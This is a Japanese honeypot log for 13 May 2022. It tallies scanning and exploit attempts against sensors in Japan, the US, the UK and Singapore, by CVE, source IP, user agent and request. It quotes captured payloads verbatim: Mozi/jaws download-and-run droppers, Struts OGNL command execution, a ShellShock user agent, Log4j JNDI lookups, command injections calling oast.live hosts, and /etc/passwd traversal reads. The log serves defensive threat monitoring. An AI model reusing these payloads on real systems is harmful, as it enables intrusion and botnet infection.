ハニーポット(仮) 観測記録 2022/05/13分です。
特徴
共通
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
zgrabによるスキャン行為
.jsへのスキャン行為
/.awsへのスキャン行為
/.envへのスキャン行為
Laravelへのスキャン行為
Location:JP
Apache Log4j2の脆弱性(CVE-2021-44228)を狙うアクセス
Apache Struts 2の脆弱性を狙うアクセス
BIG-IP製品の脆弱性(CVE-2020-5902)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Linear eMerge E3の脆弱性(CVE-2019-7256)を狙うアクセス
Lucee Adminの脆弱性(CVE-2021-21307)を狙うアクセス
Maian Cartの脆弱性(CVE-2021-32172)を狙うアクセス
OpenAMの脆弱性(CVE-2021-35464)を狙うアクセス
OpenDreamBoxの脆弱性を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2017-3506)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2018-2894)を狙うアクセス
Oracle WebLogicの脆弱性(CVE-2019-2725)を狙うアクセス
RaspAPの脆弱性(CVE-2021-33357)を狙うアクセス
SCIMonoの脆弱性(CVE-2021-21479)を狙うアクセス
ShellShock脆弱性(CVE-2014-7169)を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
VMware View Plannerの脆弱性(CVE-2021-21978)を狙うアクセス
ZeroShell Linux distributionの脆弱性(CVE-2009-0545)を狙うアクセス
ZeroShell Linux distributionの脆弱性(CVE-2020-29390)を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
fuel CMSの脆弱性(CVE-2018-16763)を狙うアクセス
vBulletinの脆弱性(CVE-2019-16759)を狙うアクセス
WordPress Pluginへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://192.168.1.1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:US
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://163.179.165.247:55075/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:UK
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.gitへのスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 209.141.59.94/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget http://210.89.39.75:35243/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
GPONルータの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget jx.qingdaosheng.com/jaws; sh /tmp/jaws
cd /tmp; rm -rf *; wget v1.kannimanelaji.com/jaws; sh /tmp/jaws
他
アクセス数推移
JP:総アクセス数:213 (前日比:51)
US:総アクセス数:80 (前日比:7)
UK:総アクセス数:43 (前日比:-105)
SG:総アクセス数:66 (前日比:0)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
138 | 3.239.96.225 | United States |
1 | 13.56.150.187 | United States |
1 | 20.101.109.35 | United States |
1 | 20.230.129.192 | United States |
1 | 24.59.83.11 | United States |
1 | 40.77.5.230 | United States |
1 | 45.144.112.133 | United Kingdom |
1 | 46.249.33.53 | Netherlands |
14 | 95.214.235.205 | Ukraine |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.118 | Russia |
2 | 109.237.103.123 | Russia |
4 | 128.1.248.42 | United States |
5 | 135.125.217.54 | France |
7 | 135.125.246.110 | France |
1 | 142.93.194.204 | United States |
1 | 143.198.235.94 | United States |
2 | 157.245.70.127 | United States |
7 | 159.203.0.168 | United States |
1 | 182.57.122.142 | India |
2 | 183.136.225.9 | China |
8 | 185.254.196.217 | Ukraine |
1 | 192.241.214.22 | United States |
1 | 198.235.24.158 | United States |
2 | 212.192.246.119 | Czechia |
3 | 213.186.1.137 | Croatia |
1 | 216.218.206.103 | United States |
1 | 220.198.241.220 | China |
1 | 222.247.8.76 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
1 | () { :; }; echo ; echo ; /bin/cat /etc/passwd |
11 | - |
1 | Abyssal |
1 | AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9 |
1 | Googlebot/2.1 (+http[:]//www[.]google[.]com/bot.html) |
2 | Hello, world |
2 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
2 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 |
8 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 |
7 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 |
3 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 |
4 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 |
4 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 |
4 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
4 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 |
5 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 |
4 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 |
4 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 |
3 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE |
2 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 |
4 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 |
6 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 |
7 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 |
7 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F |
2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 |
41 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
4 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |
3 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 |
2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
4 | Mozilla/5.0 zgrab/0.x |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | MGLNDD_18.179.20.5_80\n |
||
3 | \x16\x03\x01\x01D\x01 |
||
2 | \x16\x03\x01 |
||
1 | DELETE | /actuator/gateway/routes/290T4JJHhPpfKJlKTTvhLc2063Q |
HTTP/1.1 |
1 | GET | /.aws/credentials |
HTTP/1.1 |
41 | GET | /.env |
HTTP/1.1 |
1 | GET | /290T4MWimmhxFqdWhKpxVLjkRf9 |
HTTP/1.1 |
1 | GET | /290T4NgbtvHc9Q91DqspvtmBIH4.jsp |
HTTP/1.1 |
1 | GET | /?location=search |
HTTP/1.1 |
1 | GET | /?p=1 |
HTTP/1.1 |
1 | GET | /?x=${jndi:ldap://${hostName}.uri.c9tl1qg45cabor0000108nmj5ohp5biqe.oast.live/a} |
HTTP/1.1 |
1 | GET | /RestAPI/ImportTechnicians |
HTTP/1.1 |
1 | GET | /STATE_ID/123/agentLogUploader |
HTTP/1.1 |
1 | GET | /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /admin/airflow/code?root=&dag_id=example_passing_params_via_test_command |
HTTP/1.1 |
1 | GET | /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=290T4ILNBgvHSYSrV0OqXG0PGRm.php&target=l1_Lw |
HTTP/1.1 |
1 | GET | /ajax/networking/get_netcfg.php?iface=;curl%20http[:]//c9tl1qg45cabor000010cq8sypzk7txpa[.]oast[.]live/ whoami; |
HTTP/1.1 |
1 | GET | /api.php?key=1&apikey=1 |
HTTP/1.1 |
1 | GET | /assets/data/usrimg/290t4nzc5gflxsg85jsqy83jpxe.php |
HTTP/1.1 |
1 | GET | /c/version.js |
HTTP/1.1 |
1 | GET | /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 |
HTTP/1.1 |
1 | GET | /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d |
HTTP/1.1 |
1 | GET | /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/290T4KxvCCFMTWTqCi1KTZUHULc.jsp |
HTTP/1.1 |
1 | GET | /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW= |
HTTP/1.1 |
1 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 |
HTTP/1.1 |
1 | GET | /cgi-bin/slogin/login.py |
HTTP/1.1 |
1 | GET | /cgi-bin/stats |
HTTP/1.1 |
1 | GET | /cgi-bin/status/status.cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/status |
HTTP/1.1 |
1 | GET | /cgi-bin/test-cgi |
HTTP/1.1 |
1 | GET | /cgi-bin/test |
HTTP/1.1 |
1 | GET | /cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd |
|
1 | GET | /code?dag_id=example_passing_params_via_test_command |
HTTP/1.1 |
1 | GET | /debug.cgi |
HTTP/1.1 |
1 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 |
HTTP/1.1 |
1 | GET | /help/admin-guide/test.jsp |
HTTP/1.1 |
1 | GET | /hsqldb%0a |
HTTP/1.1 |
1 | GET | /index.action?action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |
HTTP/1.1 |
1 | GET | /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
HTTP/1.1 |
1 | GET | /index.action?redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |
HTTP/1.1 |
1 | GET | /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
HTTP/1.1 |
1 | GET | /index.action?redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D |
HTTP/1.1 |
1 | GET | /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
HTTP/1.1 |
1 | GET | /index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ== |
HTTP/1.1 |
1 | GET | /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 |
HTTP/1.1 |
1 | GET | /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
HTTP/1.1 |
1 | GET | /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
HTTP/1.1 |
1 | GET | /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} |
HTTP/1.1 |
1 | GET | /login?redirect=%2F |
HTTP/1.1 |
1 | GET | /mgmt/shared/authn/login |
HTTP/1.1 |
1 | GET | /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 |
HTTP/1.1 |
1 | GET | /nuclei.txt |
HTTP/1.1 |
1 | GET | /openam/oauth2/..;/ccversion/Version |
HTTP/1.1 |
1 | GET | /pages/systemcall.php?command=cat%20/etc/passwd |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws |
HTTP/1.1 |
4 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /test.cgi |
HTTP/1.1 |
1 | GET | /test.txt |
HTTP/1.1 |
1 | GET | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license |
HTTP/1.1 |
1 | GET | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release |
HTTP/1.1 |
1 | GET | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd |
HTTP/1.1 |
1 | GET | /ui/vropspluginui/rest/services/getstatus |
HTTP/1.1 |
1 | GET | /users/sign_in |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /webadmin/script?command=|%20nslookup%20c9tl1qg45cabor000010d8zrmi1dqax8q.oast.live |
HTTP/1.1 |
1 | GET | /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https[:]//c9tl1qg45cabor000010qhxq5zbt3b9qe[.]oast[.]live |
HTTP/1.1 |
1 | GET | /wp-content/plugins/contact-form-7/readme.txt |
HTTP/1.1 |
1 | GET | /wp-content/uploads/workreap-temp/290T4Nz9UXdLnXy9ivnbnaLBZf0.php |
HTTP/1.1 |
1 | GET | /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | GET | /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
2 | HEAD | / |
HTTP/1.1 |
1 | HEAD | /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png |
HTTP/1.1 |
1 | HEAD | /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png |
HTTP/1.1 |
1 | HEAD | /icons/.%2e/%2e%2e/apache2/icons/sphere1.png |
HTTP/1.1 |
1 | HEAD | /icons/sphere1.png |
HTTP/1.1 |
1 | POST | /./RestAPI/Connection |
HTTP/1.1 |
2 | POST | /./RestAPI/LogonCustomization |
HTTP/1.1 |
1 | POST | /EemAdminService/EemAdmin |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /_async/AsyncResponseService |
HTTP/1.1 |
6 | POST | /_ignition/execute-solution |
HTTP/1.1 |
1 | POST | /_search?pretty |
HTTP/1.1 |
2 | POST | /account |
HTTP/1.1 |
1 | POST | /actions/authenticate.php |
HTTP/1.1 |
1 | POST | /actuator/gateway/refresh |
HTTP/1.1 |
1 | POST | /actuator/gateway/routes/290T4JJHhPpfKJlKTTvhLc2063Q |
HTTP/1.1 |
2 | POST | /ajax/render/widget_tabbedcontainer_tab_panel |
HTTP/1.1 |
1 | POST | /api/content/ |
HTTP/1.1 |
1 | POST | /api/timelion/run |
HTTP/1.1 |
1 | POST | /assets/php/upload.php |
HTTP/1.1 |
1 | POST | /boaform/admin/formLogin |
HTTP/1.1 |
1 | POST | /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm |
HTTP/1.1 |
1 | POST | /cgi-bin/libagent.cgi?type=J |
HTTP/1.1 |
1 | POST | /cgi-bin/login.cgi |
HTTP/1.1 |
1 | POST | /cgi-bin/system_log.cgi |
HTTP/1.1 |
1 | POST | /cgi/networkDiag.cgi |
HTTP/1.1 |
1 | POST | /cgi?2 |
HTTP/1.1 |
1 | POST | /cgi?7 |
HTTP/1.1 |
1 | POST | /cobbler_api |
HTTP/1.1 |
1 | POST | /confluence/pages/createpage-entervariables.action?SpaceKey=x |
HTTP/1.1 |
1 | POST | /confluence/pages/createpage-entervariables.action |
HTTP/1.1 |
1 | POST | /context.json |
HTTP/1.1 |
1 | POST | /editBlackAndWhiteList |
HTTP/1.1 |
1 | POST | /en/php/usb_sync.php |
HTTP/1.1 |
1 | POST | /functionRouter |
HTTP/1.1 |
1 | POST | /goform/setSysAdm |
HTTP/1.1 |
1 | POST | /index.php |
HTTP/1.1 |
1 | POST | /integration/saveGangster.action |
HTTP/1.1 |
1 | POST | /invoker/EJBInvokerServlet/ |
HTTP/1.1 |
1 | POST | /invoker/JMXInvokerServlet/ |
HTTP/1.1 |
1 | POST | /login.htm |
HTTP/1.1 |
1 | POST | /logupload?logMetaData=%7B%22itrLogPath%22%3A%20%22..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhttpd%2Fhtml%2Fwsgi_log_upload%22%2C%20%22logFileType%22%3A%20%22log_upload_wsgi.py%22%2C%20%22workloadID%22%3A%20%222%22%7D |
HTTP/1.1 |
1 | POST | /lucee/290T4OXhWeQOyHt3bFN8LYaqy7S.cfm |
HTTP/1.1 |
1 | POST | /lucee/admin/imgProcess.cfm?file=/../../../context/290T4OXhWeQOyHt3bFN8LYaqy7S.cfm |
HTTP/1.1 |
1 | POST | /lucee/admin/imgProcess.cfm?file=/whatever |
HTTP/1.1 |
1 | POST | /mailingupgrade.php |
HTTP/1.1 |
1 | POST | /mgmt/shared/authn/login |
HTTP/1.1 |
1 | POST | /mgmt/tm/util/bash |
HTTP/1.1 |
1 | POST | /mifs/.;/services/LogService |
HTTP/1.1 |
1 | POST | /pages/createpage-entervariables.action?SpaceKey=x |
HTTP/1.1 |
2 | POST | /pages/createpage-entervariables.action |
HTTP/1.1 |
1 | POST | /pages/createpage.action?spaceKey=myproj |
HTTP/1.1 |
1 | POST | /pages/doenterpagevariables.action |
HTTP/1.1 |
1 | POST | /pages/templates2/viewpagetemplate.action |
HTTP/1.1 |
1 | POST | /password_change.cgi |
HTTP/1.1 |
1 | POST | /servlet/UploadServlet |
HTTP/1.1 |
1 | POST | /sitecore/shell/ClientBin/Reporting/Report.ashx |
HTTP/1.1 |
1 | POST | /system/sharedir.php |
HTTP/1.1 |
1 | POST | /template/custom/content-editor |
HTTP/1.1 |
1 | POST | /templates/editor-preload-container |
HTTP/1.1 |
1 | POST | /tmui/locallb/workspace/fileSave.jsp |
HTTP/1.1 |
3 | POST | /tmui/locallb/workspace/tmshCmd.jsp |
HTTP/1.1 |
1 | POST | /user.action |
HTTP/1.1 |
1 | POST | /users/user-dark-features |
HTTP/1.1 |
1 | POST | /var |
HTTP/1.1 |
1 | POST | /webtools/control/SOAPService |
HTTP/1.1 |
1 | POST | /wiki/pages/createpage-entervariables.action?SpaceKey=x |
HTTP/1.1 |
1 | POST | /wiki/pages/createpage-entervariables.action |
HTTP/1.1 |
1 | POST | /wls-wsat/CoordinatorPortType |
HTTP/1.1 |
1 | POST | /wp-admin/admin-ajax.php |
HTTP/1.1 |
1 | POST | /ws_utc/resources/setting/keystore |
HTTP/1.1 |
1 | POST | /ws_utc/resources/setting/options |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
2 | 20.101.109.35 | United States |
1 | 20.203.226.204 | United States |
11 | 45.9.20.101 | Russia |
7 | 51.79.29.48 | Canada |
21 | 94.137.92.14 | Russia |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.118 | Russia |
7 | 118.123.105.85 | China |
4 | 128.14.209.162 | United States |
